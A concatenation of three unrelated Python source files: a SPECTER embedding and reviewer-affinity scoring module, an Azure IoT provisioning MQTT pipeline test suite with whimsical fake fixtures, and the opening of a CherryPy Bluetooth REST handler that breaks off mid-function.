directory_path: $SPECTER_FOLDER/data/vocab/
cuda-device: 0
output-file: $SPECTER_TRAIN_EMB_RAW
batch-size: 16
silent
"""
class _PredictManagerCustom(_PredictManager):
"""
Source: https://github.com/allenai/specter/blob/master/scripts/embed.py
Extends the following functions from allennlp's _PredictManager class
`run` function to print predict progress
"""
def __init__(self,
predictor: Predictor,
input_file: str,
output_file: Optional[str],
batch_size: int,
print_to_console: bool,
has_dataset_reader: bool,
store_redis: bool = False,
redis_con=None) -> None:
super(_PredictManagerCustom, self).__init__(predictor, input_file, output_file, batch_size, print_to_console,
has_dataset_reader)
self.total_size = int(sum([1 for _ in open(self._input_file)]) / self._batch_size)
self._store_redis = store_redis
if store_redis:
assert redis_con is not None, "Can't store in Redis, No redis connection provided"
self._redis_con = redis_con
def run(self) -> None:
has_reader = self._dataset_reader is not None
index = 0
if has_reader:
for batch in tqdm(lazy_groups_of(self._get_instance_data(), self._batch_size), total=self.total_size,
unit="batches"):
for model_input_instance, result in zip(batch, self._predict_instances(batch)):
self._maybe_print_to_console_and_file(index, result, str(model_input_instance))
index = index + 1
else:
for batch_json in tqdm(lazy_groups_of(self._get_json_data(), self._batch_size), total=self.total_size,
unit="batches"):
for model_input_json, result in zip(batch_json, self._predict_json(batch_json)):
self._maybe_print_to_console_and_file(index, result, json.dumps(model_input_json))
index = index + 1
if self._output_file is not None:
self._output_file.close()
def _maybe_print_to_console_and_file(self,
index: int,
prediction: str,
model_input: str = None) -> None:
prediction_json = json.loads(prediction)
if self._print_to_console:
if model_input is not None:
print(f"input {index}: ", model_input)
print("prediction: ", prediction)
if self._output_file is not None:
self._output_file.write(prediction)
if self._store_redis:
self._redis_con.tensorset(key=prediction_json['paper_id'], tensor=np.array(prediction_json['embedding']))
def predictor_from_archive(archive: Archive, predictor_name: str = None,
paper_features_path: str = None) -> 'Predictor':
"""
Source: https://github.com/allenai/specter/blob/master/scripts/embed.py
Extends allennlp.predictors.predictor.from_archive to allow processing multiprocess reader
paper_features_path is passed to replace the correct one if the dataset_reader is multiprocess
"""
# Duplicate the config so that the config inside the archive doesn't get consumed
config = archive.config.duplicate()
if not predictor_name:
model_type = config.get("model").get("type")
if not model_type in DEFAULT_PREDICTORS:
raise ConfigurationError(f"No default predictor for model type {model_type}.\n" \
f"Please specify a predictor explicitly.")
predictor_name = DEFAULT_PREDICTORS[model_type]
dataset_config = config["dataset_reader"].as_dict()
if dataset_config['type'] == 'multiprocess':
dataset_config = dataset_config['base_reader']
if paper_features_path:
dataset_config['paper_features_path'] = paper_features_path
dataset_reader_params = Params(dataset_config)
else:
dataset_reader_params = config["dataset_reader"]
dataset_reader = DatasetReader.from_params(dataset_reader_params)
model = archive.model
model.eval()
return Predictor.by_name(predictor_name)(model, dataset_reader)
class SpecterPredictor:
def __init__(self, specter_dir, work_dir, average_score=False, max_score=True, batch_size=16, use_cuda=True,
sparse_value=None, use_redis=False):
self.specter_dir = specter_dir
self.model_archive_file = os.path.join(specter_dir, "model.tar.gz")
self.vocab_dir = os.path.join(specter_dir, "data/vocab/")
self.predictor_name = "specter_predictor"
self.work_dir = work_dir
self.average_score = average_score
self.max_score = max_score
assert max_score ^ average_score, "(Only) One of max_score or average_score must be True"
self.batch_size = batch_size
if use_cuda:
self.cuda_device = 0
else:
self.cuda_device = -1
self.preliminary_scores = None
self.sparse_value = sparse_value
if not os.path.exists(self.work_dir) and not os.path.isdir(self.work_dir):
os.makedirs(self.work_dir)
self.use_redis = use_redis
if use_redis:
self.redis = redisai.Client(connection_pool=redis_embeddings_pool)
else:
self.redis = None
def set_archives_dataset(self, archives_dataset):
self.pub_note_id_to_author_ids = defaultdict(list)
self.pub_author_ids_to_note_id = defaultdict(list)
self.pub_note_id_to_abstract = {}
self.pub_note_id_to_title = {}
output_dict = {}
paper_ids_list = []
for profile_id, publications in archives_dataset.items():
for publication in publications:
if publication['content'].get('title').strip() or publication['content'].get('abstract').strip():
self.pub_note_id_to_author_ids[publication['id']].append(profile_id)
self.pub_author_ids_to_note_id[profile_id].append(publication['id'])
self.pub_note_id_to_title[publication['id']] = publication['content'].get('title').strip() if publication['content'].get('title').strip() else "."
self.pub_note_id_to_abstract[publication['id']] = publication['content'].get('abstract').strip() if publication['content'].get('abstract').strip() else "."
if self.redis is None or not self.redis.exists(publication['id']):
if publication['id'] in output_dict:
output_dict[publication['id']]["authors"].append(profile_id)
else:
paper_ids_list.append(publication['id'])
output_dict[publication['id']] = {"title": self.pub_note_id_to_title[publication['id']],
"abstract": self.pub_note_id_to_abstract[publication['id']],
"paper_id": publication["id"],
"authors": [profile_id]}
else:
print(f"Skipping publication {publication['id']}. Either title or abstract must be provided ")
with open(os.path.join(self.work_dir, "specter_reviewer_paper_data.json"), 'w') as f_out:
json.dump(output_dict, f_out, indent=1)
with open(os.path.join(self.work_dir, "specter_reviewer_paper_ids.txt"), 'w') as f_out:
f_out.write('\n'.join(paper_ids_list)+'\n')
def set_submissions_dataset(self, submissions_dataset):
self.sub_note_id_to_abstract = {}
self.sub_note_id_to_title = {}
output_dict = {}
paper_ids_list = []
for note_id, submission in submissions_dataset.items():
self.sub_note_id_to_title[submission['id']] = submission['content'].get('title', "")
self.sub_note_id_to_abstract[submission['id']] = submission['content'].get('abstract', "")
paper_ids_list.append(submission['id'])
output_dict[submission['id']] = {"title": self.sub_note_id_to_title[submission['id']],
"abstract": self.sub_note_id_to_abstract[submission['id']],
"paper_id": submission["id"],
"authors": []}
with open(os.path.join(self.work_dir, "specter_submission_paper_data.json"), 'w') as f_out:
json.dump(output_dict, f_out, indent=1)
with open(os.path.join(self.work_dir, "specter_submission_paper_ids.txt"), 'w') as f_out:
f_out.write('\n'.join(paper_ids_list)+'\n')
def embed_submissions(self, submissions_path=None):
print('Embedding submissions...')
metadata_file = os.path.join(self.work_dir, "specter_submission_paper_data.json")
ids_file = os.path.join(self.work_dir, "specter_submission_paper_ids.txt")
# Overrides default config in the saved specter archive
overrides = json.dumps({'model': {'predict_mode': 'true', 'include_venue': 'false',
'text_field_embedder': {
'token_embedders': {
'bert': {
'pretrained_model': os.path.join(self.specter_dir,
"data/scibert_scivocab_uncased/scibert.tar.gz")
}
}
}
},
"train_data_path": os.path.join(self.specter_dir, "data/train.csv"),
"validation_data_path": os.path.join(self.specter_dir, "data/val.csv"),
"test_data_path": os.path.join(self.specter_dir, "data/test.csv"),
'dataset_reader': {'type': 'specter_data_reader', 'predict_mode': 'true',
'paper_features_path': metadata_file,
'included_text_fields': 'abstract title',
'cache_path': os.path.join(self.specter_dir,
'data/dataset-instance-cache/'),
'data_file': os.path.join(self.specter_dir, 'data/train.json'),
'token_indexers': {
'bert': {
"pretrained_model": os.path.join(self.specter_dir,
"data/scibert_scivocab_uncased/vocab.txt")
}
}
},
'vocabulary': {'directory_path': self.vocab_dir}
})
archive = load_archive(self.model_archive_file,
weights_file=None,
cuda_device=self.cuda_device,
overrides=overrides)
predictor = predictor_from_archive(archive, self.predictor_name, metadata_file)
manager = _PredictManagerCustom(predictor,
ids_file,
submissions_path,
self.batch_size,
False,
False)
manager.run()
def embed_publications(self, publications_path=None):
if not self.use_redis:
assert publications_path, "Either publications_path must be given or use_redis must be set to true"
print('Embedding publications...')
metadata_file = os.path.join(self.work_dir, "specter_reviewer_paper_data.json")
ids_file = os.path.join(self.work_dir, "specter_reviewer_paper_ids.txt")
# Overrides default config in the saved specter archive
overrides = json.dumps({'model': {'predict_mode': 'true', 'include_venue': 'false',
'text_field_embedder': {
'token_embedders': {
'bert': {
'pretrained_model': os.path.join(self.specter_dir, "data/scibert_scivocab_uncased/scibert.tar.gz")
}
}
}
},
"train_data_path": os.path.join(self.specter_dir, "data/train.csv"),
"validation_data_path": os.path.join(self.specter_dir, "data/val.csv"),
"test_data_path": os.path.join(self.specter_dir, "data/test.csv"),
'dataset_reader': {'type': 'specter_data_reader', 'predict_mode': 'true',
'paper_features_path': metadata_file,
'included_text_fields': 'abstract title',
'cache_path': os.path.join(self.specter_dir,
'data/dataset-instance-cache/'),
'data_file': os.path.join(self.specter_dir, 'data/train.json'),
'token_indexers': {
'bert': {
"pretrained_model": os.path.join(self.specter_dir,
"data/scibert_scivocab_uncased/vocab.txt")
}
}
},
'vocabulary': {'directory_path': self.vocab_dir}
})
archive = load_archive(self.model_archive_file,
weights_file=None,
cuda_device=self.cuda_device,
overrides=overrides)
predictor = predictor_from_archive(archive, self.predictor_name, metadata_file)
redis_client = self.redis.client() if self.use_redis else None
manager = _PredictManagerCustom(predictor,
ids_file,
publications_path,
self.batch_size,
False,
False,
store_redis=self.use_redis,
redis_con=redis_client)
manager.run()
def all_scores(self, publications_path=None, submissions_path=None, scores_path=None):
def load_emb_file(emb_file):
paper_emb_size_default = 768
id_list = []
emb_list = []
bad_id_set = set()
for line in emb_file:
paper_data = json.loads(line.rstrip())
paper_id = paper_data['paper_id']
paper_emb_size = len(paper_data['embedding'])
assert paper_emb_size == 0 or paper_emb_size == paper_emb_size_default
if paper_emb_size == 0:
paper_emb = [0] * paper_emb_size_default
bad_id_set.add(paper_id)
else:
paper_emb = paper_data['embedding']
id_list.append(paper_id)
emb_list.append(paper_emb)
emb_tensor = torch.tensor(emb_list, device=torch.device('cpu'))
emb_tensor = emb_tensor / (emb_tensor.norm(dim=1, keepdim=True) + 0.000000000001)
print(len(bad_id_set))
return emb_tensor, id_list, bad_id_set
def load_from_redis():
paper_emb_size_default = 768
id_list = self.pub_note_id_to_title.keys()
emb_list = []
bad_id_set = set()
for paper_id in id_list:
try:
paper_emb = self.redis.tensorget(key=paper_id, as_numpy_mutable=True)
assert len(paper_emb) == paper_emb_size_default
emb_list.append(paper_emb)
except Exception as e:
bad_id_set.add(paper_id)
emb_tensor = torch.tensor(emb_list, device=torch.device('cpu'))
emb_tensor = emb_tensor / (emb_tensor.norm(dim=1, keepdim=True) + 0.000000000001)
if bad_id_set:
print(f"No Embedding found for {len(bad_id_set)} Papers: ")
print(bad_id_set)
return emb_tensor, id_list, bad_id_set
print('Loading cached publications...')
if self.use_redis:
paper_emb_train, train_id_list, train_bad_id_set = load_from_redis()
else:
with open(publications_path) as f_in:
paper_emb_train, train_id_list, train_bad_id_set = load_emb_file(f_in)
paper_num_train = len(train_id_list)
paper_id2train_idx = {}
for idx, paper_id in enumerate(train_id_list):
paper_id2train_idx[paper_id] = idx
with open(submissions_path) as f_in:
print('Loading cached submissions...')
paper_emb_test, test_id_list, test_bad_id_set = load_emb_file(f_in)
paper_num_test = len(test_id_list)
print('Computing all scores...')
p2p_aff = torch.empty((paper_num_test, paper_num_train), device=torch.device('cpu'))
for i in range(paper_num_test):
p2p_aff[i, :] = torch.sum(paper_emb_test[i, :].unsqueeze(dim=0) * paper_emb_train, dim=1)
csv_scores = []
self.preliminary_scores = []
for reviewer_id, train_note_id_list in self.pub_author_ids_to_note_id.items():
if len(train_note_id_list) == 0:
continue
train_paper_idx = []
for paper_id in train_note_id_list:
if paper_id not in train_bad_id_set:
train_paper_idx.append(paper_id2train_idx[paper_id])
train_paper_aff_j = p2p_aff[:, train_paper_idx]
if self.average_score:
all_paper_aff = train_paper_aff_j.mean(dim=1)
elif self.max_score:
all_paper_aff = train_paper_aff_j.max(dim=1)[0]
for j in range(paper_num_test):
csv_line = '{note_id},{reviewer},{score}'.format(note_id=test_id_list[j], reviewer=reviewer_id,
score=all_paper_aff[j].item())
csv_scores.append(csv_line)
self.preliminary_scores.append((test_id_list[j], reviewer_id, all_paper_aff[j].item()))
if scores_path:
with open(scores_path, 'w') as f:
for csv_line in csv_scores:
f.write(csv_line + '\n')
return self.preliminary_scores
def _sparse_scores_helper(self, all_scores, id_index):
counter = 0
# Get the first note_id or profile_id
current_id = self.preliminary_scores[0][id_index]
if id_index == 0:
desc = 'Note IDs'
else:
desc = 'Profiles IDs'
for note_id, profile_id, score in tqdm(self.preliminary_scores, total=len(self.preliminary_scores), desc=desc):
if counter < self.sparse_value:
all_scores.add((note_id, profile_id, score))
elif (note_id, profile_id)[id_index] != current_id:
counter = 0
all_scores.add((note_id, profile_id, score))
current_id = (note_id, profile_id)[id_index]
counter += 1
return all_scores
def sparse_scores(self, scores_path=None):
if self.preliminary_scores is None:
raise RuntimeError("Call all_scores before calling sparse_scores")
print('Sorting...')
self.preliminary_scores.sort(key=lambda x: (x[0], x[2]), reverse=True)
print('Sort 1 complete')
all_scores = set()
# They are first sorted by note_id
all_scores = self._sparse_scores_helper(all_scores, 0)
# Sort by profile_id
print('Sorting...')
self.preliminary_scores.sort(key=lambda x: (x[1], x[2]), reverse=True)
print('Sort 2 complete')
all_scores = self._sparse_scores_helper(all_scores, 1)
print('Final Sort...')
all_scores = sorted(list(all_scores), key=lambda x: (x[0], x[2]), reverse=True)
if scores_path:
with open(scores_path, 'w') as f:
for note_id, profile_id, score in all_scores:
f.write('{0},{1},{2}\n'.format(note_id, profile_id, score))
print('Sparse score computation complete')
return all_scores
|
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
import logging
import pytest
import sys
import six.moves.urllib as urllib
from azure.iot.device import constant
from azure.iot.device.common.pipeline import (
pipeline_ops_base,
pipeline_stages_base,
pipeline_ops_mqtt,
pipeline_events_mqtt,
)
from azure.iot.device.provisioning.pipeline import (
pipeline_events_provisioning,
pipeline_ops_provisioning,
pipeline_stages_provisioning_mqtt,
)
from tests.common.pipeline.helpers import (
assert_callback_failed,
assert_callback_succeeded,
all_common_ops,
all_common_events,
all_except,
make_mock_stage,
UnhandledException,
)
from tests.provisioning.pipeline.helpers import all_provisioning_ops, all_provisioning_events
from tests.common.pipeline import pipeline_stage_test
logging.basicConfig(level=logging.INFO)
this_module = sys.modules[__name__]
# This fixture makes it look like all test in this file tests are running
# inside the pipeline thread. Because this is an autouse fixture, we
# manually add it to the individual test.py files that need it. If,
# instead, we had added it to some conftest.py, it would be applied to
# every tests in every file and we don't want that.
@pytest.fixture(autouse=True)
def apply_fake_pipeline_thread(fake_pipeline_thread):
pass
fake_device_id = "elder_wand"
fake_registration_id = "registered_remembrall"
fake_provisioning_host = "hogwarts.com"
fake_id_scope = "weasley_wizard_wheezes"
fake_sas_token = "<PASSWORD>_token"
fake_security_client = "secure_via_muffliato"
fake_request_id = "fake_request_1234"
fake_mqtt_payload = "hello hogwarts"
fake_operation_id = "fake_operation_9876"
fake_client_cert = "fake_client_cert"
invalid_feature_name = "__invalid_feature_name__"
unmatched_mqtt_topic = "__unmatched_mqtt_topic__"
fake_response_topic = "$dps/registrations/res/200/?$rid={}".format(fake_request_id)
ops_handled_by_this_stage = [
pipeline_ops_provisioning.SetProvisioningClientConnectionArgsOperation,
pipeline_ops_provisioning.SendRegistrationRequestOperation,
pipeline_ops_provisioning.SendQueryRequestOperation,
pipeline_ops_base.EnableFeatureOperation,
pipeline_ops_base.DisableFeatureOperation,
]
events_handled_by_this_stage = [pipeline_events_mqtt.IncomingMQTTMessageEvent]
pipeline_stage_test.add_base_pipeline_stage_tests(
cls=pipeline_stages_provisioning_mqtt.ProvisioningMQTTConverterStage,
module=this_module,
all_ops=all_common_ops + all_provisioning_ops,
handled_ops=ops_handled_by_this_stage,
all_events=all_common_events + all_provisioning_events,
handled_events=events_handled_by_this_stage,
extra_initializer_defaults={"action_to_topic": dict},
)
@pytest.fixture(scope="function")
def some_exception():
return Exception("Alohomora")
@pytest.fixture
def mock_stage(mocker):
return make_mock_stage(mocker, pipeline_stages_provisioning_mqtt.ProvisioningMQTTConverterStage)
@pytest.fixture
def set_security_client_args(callback):
op = pipeline_ops_provisioning.SetProvisioningClientConnectionArgsOperation(
provisioning_host=fake_provisioning_host,
registration_id=fake_registration_id,
id_scope=fake_id_scope,
sas_token=fake_sas_token,
client_cert=fake_client_cert,
callback=callback,
)
return op
@pytest.fixture
def stages_configured(mock_stage, set_security_client_args, mocker):
set_security_client_args.callback = None
mock_stage.run_op(set_security_client_args)
mocker.resetall()
@pytest.mark.describe(
"ProvisioningMQTTConverterStage run_op function with SetProvisioningClientConnectionArgsOperation"
)
class TestProvisioningMQTTConverterWithSetProvisioningClientConnectionArgsOperation(object):
@pytest.mark.it(
"Runs a pipeline_ops_mqtt.SetMQTTConnectionArgsOperation operation on the next stage"
)
def test_runs_set_connection_args(self, mock_stage, set_security_client_args):
mock_stage.run_op(set_security_client_args)
assert mock_stage.next._execute_op.call_count == 1
new_op = mock_stage.next._execute_op.call_args[0][0]
assert isinstance(new_op, pipeline_ops_mqtt.SetMQTTConnectionArgsOperation)
@pytest.mark.it(
"Sets SetMQTTConnectionArgsOperation.client_id = SetProvisioningClientConnectionArgsOperation.registration_id"
)
def test_sets_client_id(self, mock_stage, set_security_client_args):
mock_stage.run_op(set_security_client_args)
new_op = mock_stage.next._execute_op.call_args[0][0]
assert new_op.client_id == fake_registration_id
@pytest.mark.it(
"Sets SetMQTTConnectionArgsOperation.hostname = SetProvisioningClientConnectionArgsOperation.provisioning_host"
)
def test_sets_hostname(self, mock_stage, set_security_client_args):
mock_stage.run_op(set_security_client_args)
new_op = mock_stage.next._execute_op.call_args[0][0]
assert new_op.hostname == fake_provisioning_host
@pytest.mark.it(
"Sets SetMQTTConnectionArgsOperation.client_cert = SetProvisioningClientConnectionArgsOperation.client_cert"
)
def test_sets_client_cert(self, mock_stage, set_security_client_args):
mock_stage.run_op(set_security_client_args)
new_op = mock_stage.next._execute_op.call_args[0][0]
assert new_op.client_cert == fake_client_cert
@pytest.mark.it(
"Sets SetMQTTConnectionArgsOperation.sas_token = SetProvisioningClientConnectionArgsOperation.sas_token"
)
def test_sets_sas_token(self, mock_stage, set_security_client_args):
mock_stage.run_op(set_security_client_args)
new_op = mock_stage.next._execute_op.call_args[0][0]
assert new_op.sas_token == fake_sas_token
@pytest.mark.it(
"Sets MqttConnectionArgsOperation.username = SetProvisioningClientConnectionArgsOperation.{id_scope}/registrations/{registration_id}/api-version={api_version}&ClientVersion={client_version}"
)
def test_sets_username(self, mock_stage, set_security_client_args):
mock_stage.run_op(set_security_client_args)
new_op = mock_stage.next._execute_op.call_args[0][0]
assert (
new_op.username
== "{id_scope}/registrations/{registration_id}/api-version={api_version}&ClientVersion={client_version}".format(
id_scope=fake_id_scope,
registration_id=fake_registration_id,
api_version=constant.PROVISIONING_API_VERSION,
client_version=urllib.parse.quote_plus(constant.USER_AGENT),
)
)
@pytest.mark.it(
"Calls the SetSymmetricKeySecurityClientArgs callback with error if the pipeline_ops_mqtt.SetMQTTConnectionArgsOperation operation raises an Exception"
)
def test_set_connection_args_raises_exception(
self, mock_stage, mocker, some_exception, set_security_client_args
):
mock_stage.next._execute_op = mocker.Mock(side_effect=some_exception)
mock_stage.run_op(set_security_client_args)
assert_callback_failed(op=set_security_client_args, error=some_exception)
@pytest.mark.it(
"Allows any BaseExceptions raised inside the pipeline_ops_mqtt.SetMQTTConnectionArgsOperation operation to propagate"
)
def test_set_connection_args_raises_base_exception(
self, mock_stage, mocker, fake_base_exception, set_security_client_args
):
mock_stage.next._execute_op = mocker.Mock(side_effect=fake_base_exception)
with pytest.raises(UnhandledException):
mock_stage.run_op(set_security_client_args)
@pytest.mark.it(
"Calls the SetSymmetricKeySecurityClientArgs callback with no error if the pipeline_ops_mqtt.SetMQTTConnectionArgsOperation operation succeeds"
)
def test_returns_success_if_set_connection_args_succeeds(
self, mock_stage, mocker, set_security_client_args
):
mock_stage.run_op(set_security_client_args)
assert_callback_succeeded(op=set_security_client_args)
basic_ops = [
{
"op_class": pipeline_ops_provisioning.SendRegistrationRequestOperation,
"op_init_kwargs": {"request_id": fake_request_id, "request_payload": fake_mqtt_payload},
"new_op_class": pipeline_ops_mqtt.MQTTPublishOperation,
},
{
"op_class": pipeline_ops_provisioning.SendQueryRequestOperation,
"op_init_kwargs": {
"request_id": fake_request_id,
"operation_id": fake_operation_id,
"request_payload": fake_mqtt_payload,
},
"new_op_class": pipeline_ops_mqtt.MQTTPublishOperation,
},
{
"op_class": pipeline_ops_base.EnableFeatureOperation,
"op_init_kwargs": {"feature_name": None},
"new_op_class": pipeline_ops_mqtt.MQTTSubscribeOperation,
},
{
"op_class": pipeline_ops_base.DisableFeatureOperation,
"op_init_kwargs": {"feature_name": None},
"new_op_class": pipeline_ops_mqtt.MQTTUnsubscribeOperation,
},
]
@pytest.fixture
def op(params, callback):
op = params["op_class"](**params["op_init_kwargs"])
op.callback = callback
return op
@pytest.mark.parametrize(
"params",
basic_ops,
ids=["{}->{}".format(x["op_class"].__name__, x["new_op_class"].__name__) for x in basic_ops],
)
@pytest.mark.describe("ProvisioningMQTTConverterStage basic operation tests")
class TestProvisioningMQTTConverterBasicOperations(object):
@pytest.mark.it("Runs an operation on the next stage")
def test_runs_publish(self, params, mock_stage, stages_configured, op):
mock_stage.run_op(op)
new_op = mock_stage.next._execute_op.call_args[0][0]
assert isinstance(new_op, params["new_op_class"])
@pytest.mark.it("Calls the original op callback with error if the new_op raises an Exception")
def test_new_op_raises_exception(
self, params, mocker, mock_stage, stages_configured, op, some_exception
):
mock_stage.next._execute_op = mocker.Mock(side_effect=some_exception)
mock_stage.run_op(op)
assert_callback_failed(op=op, error=some_exception)
@pytest.mark.it("Allows any BaseExceptions raised from inside new_op to propagate")
def test_new_op_raises_base_exception(
self, params, mocker, mock_stage, stages_configured, op, fake_base_exception
):
mock_stage.next._execute_op = mocker.Mock(side_effect=fake_base_exception)
with pytest.raises(UnhandledException):
mock_stage.run_op(op)
@pytest.mark.it("Calls the original op callback with no error if the new_op operation succeeds")
def test_returns_success_if_publish_succeeds(self, params, mock_stage, stages_configured, op):
mock_stage.run_op(op)
assert_callback_succeeded(op)
publish_ops = [
{
"name": "send register request",
"op_class": pipeline_ops_provisioning.SendRegistrationRequestOperation,
"op_init_kwargs": {"request_id": fake_request_id, "request_payload": fake_mqtt_payload},
"topic": "$dps/registrations/PUT/iotdps-register/?$rid={request_id}".format(
request_id=fake_request_id
),
"publish_payload": fake_mqtt_payload,
},
{
"name": "send query request",
"op_class": pipeline_ops_provisioning.SendQueryRequestOperation,
"op_init_kwargs": {
"request_id": fake_request_id,
"operation_id": fake_operation_id,
"request_payload": fake_mqtt_payload,
},
"topic": "$dps/registrations/GET/iotdps-get-operationstatus/?$rid={request_id}&operationId={operation_id}".format(
request_id=fake_request_id, operation_id=fake_operation_id
),
"publish_payload": fake_mqtt_payload,
},
]
@pytest.mark.parametrize("params", publish_ops, ids=[x["name"] for x in publish_ops])
@pytest.mark.describe("ProvisioningMQTTConverterStage run_op function for publish operations")
class TestProvisioningMQTTConverterForPublishOps(object):
@pytest.mark.it("Uses correct registration topic string when publishing")
def test_uses_topic_for(self, mock_stage, stages_configured, params, op):
mock_stage.run_op(op)
new_op = mock_stage.next._execute_op.call_args[0][0]
assert new_op.topic == params["topic"]
@pytest.mark.it("Sends correct payload when publishing")
def test_sends_correct_body(self, mock_stage, stages_configured, params, op):
mock_stage.run_op(op)
new_op = mock_stage.next._execute_op.call_args[0][0]
assert new_op.payload == params["publish_payload"]
sub_unsub_operations = [
{
"op_class": pipeline_ops_base.EnableFeatureOperation,
"new_op": pipeline_ops_mqtt.MQTTSubscribeOperation,
},
{
"op_class": pipeline_ops_base.DisableFeatureOperation,
"new_op": pipeline_ops_mqtt.MQTTUnsubscribeOperation,
},
]
@pytest.mark.describe("ProvisioningMQTTConverterStage run_op function with EnableFeature operation")
class TestProvisioningMQTTConverterWithEnable(object):
@pytest.mark.parametrize(
"op_parameters",
sub_unsub_operations,
ids=[x["op_class"].__name__ for x in sub_unsub_operations],
)
@pytest.mark.it("Gets the correct topic")
def test_converts_feature_name_to_topic(
self, mocker, mock_stage, stages_configured, op_parameters
):
topic = "$dps/registrations/res/#"
mock_stage.next._execute_op = mocker.Mock()
op = op_parameters["op_class"](feature_name=None)
mock_stage.run_op(op)
new_op = mock_stage.next._execute_op.call_args[0][0]
assert isinstance(new_op, op_parameters["new_op"])
assert new_op.topic == topic
@pytest.fixture
def add_pipeline_root(mock_stage, mocker):
root = pipeline_stages_base.PipelineRootStage()
mocker.spy(root, "handle_pipeline_event")
mock_stage.previous = root
@pytest.mark.describe("ProvisioningMQTTConverterStage _handle_pipeline_event")
class TestProvisioningMQTTConverterHandlePipelineEvent(object):
@pytest.mark.it("Passes up any mqtt messages with topics that aren't matched by this stage")
def test_passes_up_mqtt_message_with_unknown_topic(
self, mock_stage, stages_configured, add_pipeline_root, mocker
):
event = pipeline_events_mqtt.IncomingMQTTMessageEvent(
topic=unmatched_mqtt_topic, payload=fake_mqtt_payload
)
mock_stage.handle_pipeline_event(event)
assert mock_stage.previous.handle_pipeline_event.call_count == 1
assert mock_stage.previous.handle_pipeline_event.call_args == mocker.call(event)
@pytest.fixture
def dps_response_event():
return pipeline_events_mqtt.IncomingMQTTMessageEvent(
topic=fake_response_topic, payload=fake_mqtt_payload.encode("utf-8")
)
@pytest.mark.describe("ProvisioningMQTTConverterStage _handle_pipeline_event for response")
class TestProvisioningMQTTConverterHandlePipelineEventRegistrationResponse(object):
@pytest.mark.it(
"Converts mqtt message with topic $dps/registrations/res/#/ to registration response event"
)
def test_converts_response_topic_to_registration_response_event(
self, mocker, mock_stage, stages_configured, add_pipeline_root, dps_response_event
):
mock_stage.handle_pipeline_event(dps_response_event)
assert mock_stage.previous.handle_pipeline_event.call_count == 1
new_event = mock_stage.previous.handle_pipeline_event.call_args[0][0]
assert isinstance(new_event, pipeline_events_provisioning.RegistrationResponseEvent)
@pytest.mark.it("Extracts message properties from the mqtt topic for c2d messages")
def test_extracts_some_properties_from_topic(
self, mocker, mock_stage, stages_configured, add_pipeline_root, dps_response_event
):
mock_stage.handle_pipeline_event(dps_response_event)
new_event = mock_stage.previous.handle_pipeline_event.call_args[0][0]
assert new_event.request_id == fake_request_id
assert new_event.status_code == "200"
@pytest.mark.it("Passes up other messages")
def test_if_topic_is_not_response(
self, mocker, mock_stage, stages_configured, add_pipeline_root
):
fake_some_other_topic = "devices/{}/messages/devicebound/".format(fake_device_id)
event = pipeline_events_mqtt.IncomingMQTTMessageEvent(
topic=fake_some_other_topic, payload=fake_mqtt_payload
)
mock_stage.handle_pipeline_event(event)
assert mock_stage.previous.handle_pipeline_event.call_count == 1
assert mock_stage.previous.handle_pipeline_event.call_args == mocker.call(event)
|
<reponame>LairdCP/weblcm-python
from typing import List, Optional
import cherrypy
import dbus
import dbus.exceptions
import dbus.mainloop.glib
import dbus.service
import weblcm_bluetooth_plugin
import weblcm_def
from weblcm_ble import (
find_controller, find_controllers, controller_pretty_name, find_device, find_devices,
DEVICE_IFACE, ADAPTER_IFACE, python_to_dbus, AgentSingleton, BLUEZ_SERVICE_NAME, uri_to_uuid
)
# TODO: USER_PERMISSION_TYPES for Bluetooth
PAIR_TIMEOUT_SECONDS = 60
# These device properties can be directly set, without requiring any special-case logic.
SETTABLE_DEVICE_PROPS = [("Trusted", bool)]
# These controller properties can be directly set, without requiring any special-case logic.
PASS_ADAPTER_PROPS = ["Discovering", "Powered", "Discoverable"]
bluetooth_plugins: List[weblcm_bluetooth_plugin.BluetoothPlugin] = []
try:
from weblcm_hid_barcode_scanner import HidBarcodeScannerPlugin
bluetooth_plugins.append(HidBarcodeScannerPlugin())
cherrypy.log("weblcm_bluetooth: HidBarcodeScannerPlugin loaded")
except ImportError:
cherrypy.log("weblcm_bluetooth: HidBarcodeScannerPlugin NOT loaded")
try:
from weblcm_vsp_connection import VspConnectionPlugin
bluetooth_plugins.append(VspConnectionPlugin())
cherrypy.log("weblcm_bluetooth: VspConnectionPlugin loaded")
except ImportError:
cherrypy.log("weblcm_bluetooth: VspConnectionPlugin NOT loaded")
def GetControllerObj(name: str = None):
result = {}
# get the system bus
bus = dbus.SystemBus()
# get the ble controller
controller = find_controller(bus, name)
if not controller:
result['InfoMsg'] = f"Controller {controller_pretty_name(name)} not found."
result['SDCERR'] = weblcm_def.WEBLCM_ERRORS.get('SDCERR_FAIL', 1)
controller_obj = None
else:
controller_obj = bus.get_object(BLUEZ_SERVICE_NAME, controller)
return bus, controller_obj, result
@cherrypy.expose
@cherrypy.popargs('controller', 'device')
class Bluetooth(object):
def __init__(self):
self.controller_state = {}
@cherrypy.tools.json_out()
def GET(self, *args, **kwargs):
result = {
'SDCERR': weblcm_def.WEBLCM_ERRORS.get('SDCERR_FAIL', 1),
'InfoMsg':'',
}
filters: Optional[List[str]] = None
if 'filter' in cherrypy.request.params:
filters = cherrypy.request.params['filter'].split(",")
if 'controller' in cherrypy.request.params:
controller_name = cherrypy.request.params['controller'].replace("controller", "hci")
else:
controller_name = None
if 'device' in cherrypy.request.params:
device_uuid = uri_to_uuid(cherrypy.request.params['device'])
else:
device_uuid = None
# get the system bus
bus = dbus.SystemBus()
# get the ble controller
if controller_name is not None:
controller = find_controller(bus, controller_name)
controllers = [controller]
if not controller:
result['InfoMsg'] = f"Controller {controller_pretty_name(controller_name)} not found."
return result
else:
controllers = find_controllers(bus)
for controller in controllers:
controller_friendly_name: str = controller.replace("hci", "controller").replace("/org/bluez/", "")
controller_result = {}
controller_obj = bus.get_object(BLUEZ_SERVICE_NAME, controller)
if not controller_obj:
result['InfoMsg'] = f"Controller {controller_pretty_name(controller_name)} not found."
return result
try:
matched_filter = False
if not device_uuid:
if not filters or 'bluetoothDevices' in filters:
controller_result['bluetoothDevices'] = find_devices(bus)
matched_filter = True
adapter_props = dbus.Interface(controller_obj, "org.freedesktop.DBus.Properties")
adapter_methods = dbus.Interface(controller_obj, "org.freedesktop.DBus.Methods")
if not filters or 'transportFilter' in filters:
controller_result['transportFilter'] = self.get_adapter_transport_filter(
controller_name)
matched_filter = True
for pass_property in PASS_ADAPTER_PROPS:
